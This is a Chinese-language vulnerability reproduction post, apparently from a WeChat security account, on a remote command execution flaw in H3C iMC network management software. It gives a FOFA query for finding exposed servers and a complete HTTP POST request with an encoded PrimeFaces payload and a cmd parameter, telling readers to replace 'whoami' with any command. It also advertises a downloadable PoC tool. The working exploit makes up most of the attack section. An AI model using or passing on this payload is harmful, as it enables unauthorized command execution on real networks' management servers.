H3C iMC 存在远程命令执行漏洞

文章目录

  • H3C iMC 存在远程命令执行漏洞
    • 1. H3C iMC 简介
    • 2.漏洞描述
    • 3.影响版本
    • 4.fofa 查询语句
    • 5.漏洞复现
    • 6.POC&EXP
    • 7.整改意见
    • 8.往期回顾

H3C iMC 存在远程命令执行漏洞

1. H3C iMC 简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

iMC 是 H3C 公司凭借多年网络管理产品的研发经验和对网络管理的深刻理解,推出了新一代的网络管理产品 H3C iMC 以业务管理和业务流程模型为核心,采用面向服务(SOA)的设计思想,按需装配的组件化结构,为客户提供网络业务、资源和用户的融合管理解决方案,帮助客户实现网络业务的端到端管理。通过 H3C iMC 能够灵活组织功能组件,形成直接面向客户需求的业务流解决方案,从根本上解决多业务融合管理的复杂性。

2.漏洞描述

H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。

3.影响版本

4.fofa 查询语句

“/imc/login.jsf” && body=“/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui”

H3C iMC 存在远程命令执行漏洞_第1张图片

5.漏洞复现

漏洞链接:
http://127.0.0.1:9090/imc/javax.faces.resource/dynamiccontent.properties.xhtml
漏洞数据包如下,把数据包中的 whoami 改成你想执行的命令即可。

POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 1569
Content-Type: application/x-www-form-urlencoded

pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami

H3C iMC 存在远程命令执行漏洞_第2张图片

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现22 即可获得该 POC 工具下载地址:

本次的 poc 加入了代理功能,方便各位师傅调试。
H3C iMC 存在远程命令执行漏洞_第3张图片

7.整改意见

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: https://www.h3c.com/cn/

8.往期回顾

你可能感兴趣的:(网络,web安全)